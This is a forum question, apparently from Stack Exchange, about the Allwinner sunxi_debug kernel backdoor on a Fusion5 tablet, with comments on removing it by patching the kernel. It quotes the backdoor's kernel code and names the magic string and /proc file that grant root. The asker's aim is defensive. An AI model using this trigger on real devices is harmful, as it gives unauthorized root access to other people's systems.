9

I read on The Register that a root backdoor is triggered by writing rootmydevice to the special file /proc/sunxi_debug/sunxi_debug. That gives the current running process root privileges. If that file is present on your device or single-board computer, then you need to get rid of it. This is the code that checks for the magic write:

if(!strncmp("rootmydevice",(char*)buf,12)){
    cred = (struct cred *)__task_cred(current);
    cred->uid = 0;
    cred->gid = 0;
    cred->suid = 0;
    cred->euid = 0;
    cred->euid = 0;
    cred->egid = 0;
    cred->fsuid = 0;
    cred->fsgid = 0;
    printk("now you are root\n");
}

I have questions:

  1. I have a Fusion5 tablet (which is rooted) manufactured by Allwinner with sun8I chipset using kernel 3.4.39. The file /proc/sunxi_debug/sunxi_debug is zero length. If the code is present, which file (if any) would it be in?
  2. When using Terminal Emulator, I do rm /proc/.sunxi_debug/sunxi_debug, I get "Permission denied". sudo su gets "sudo: not found". How do I delete the /proc/sunxi_debug/sunxi_debug file?
Andrew T.
  • 15,988
  • 10
  • 74
  • 123
John Rose
  • 241
  • 1
  • 2
  • 6
  • 2
    To get root access, you only need to call su, no need sudo su (because there's no sudo on Android). – Andrew T. May 10 '16 at 06:43
  • I just want you to note that the /proc is populated at every reboot and the kernel can recreate that file, should it need to. The correct way is to patch the kernel appropriately. – Firelord May 10 '16 at 14:39
  • Thanks, Andrew. I think that the best idea is simply not to have Debug Mode set since the following quote seems to imply that is what lets the back door open: "Its Linux 3.4-based kernel code, on Github here, contains what looks to The Register like a debug mode the authors forgot to kill.".

    Am I correct in the above and am I correct in not deleting the file /proc/sunxi_debug/sunxi_debug since it is zero length.

    PS the original article on this back door is at: http://www.theregister.co.uk/2016/05/09/allwinners_allloser_custom_kernel_has_a_nasty_root_backdoor/

     – John Rose May 11 '16 at 06:27
  • I'm going to try this tonight, but I'd wager you can change the write permissions of sunxi_debug. –  May 11 '16 at 17:41
  • /proc is a virtual file system, and its contents is determined by the running kernel. You're not going to be able to rm (or probably even chmod) the file, regardless of root or not. In order to get rid of the backdoor, you need to recompile the kernel w/o the backdoor code. [Not an answer, because compile the kernel is a far from trivial step...] Maybe you could use SELinux to block access to the file, not sure. Or create a kernel module to do so. – derobert May 12 '16 at 17:32

0 Answers0